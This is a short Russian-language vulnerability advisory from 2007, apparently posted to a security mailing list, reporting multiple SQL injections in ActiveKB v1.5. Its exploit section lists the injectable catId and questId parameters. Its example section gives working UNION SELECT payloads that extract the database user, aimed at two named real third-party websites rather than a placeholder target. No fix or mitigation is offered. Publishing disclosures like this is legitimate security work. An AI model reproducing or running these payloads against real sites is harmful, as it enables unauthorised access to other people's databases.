Здравствуйте, 3APA3A.
Software: ActiveKB v1.5
Vendor: www.interspire.com
Vulnerability: множественные SQL-инъекции
Risk: средний
Date: 27.08.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP: durito.narod.ru
+~~~:| Details |:
SQL-инъекции
+~~~:| Экплойт |:
http://www.target.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.target.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]
+~~~:| Пример |:
http://www.accessecu.com/kb/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/*
http://summitsupport.net/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/*
–
С уважением,
durito [NGH Group] mailto:[email protected]
http://durito.narod.ru
http://ngh.void.ru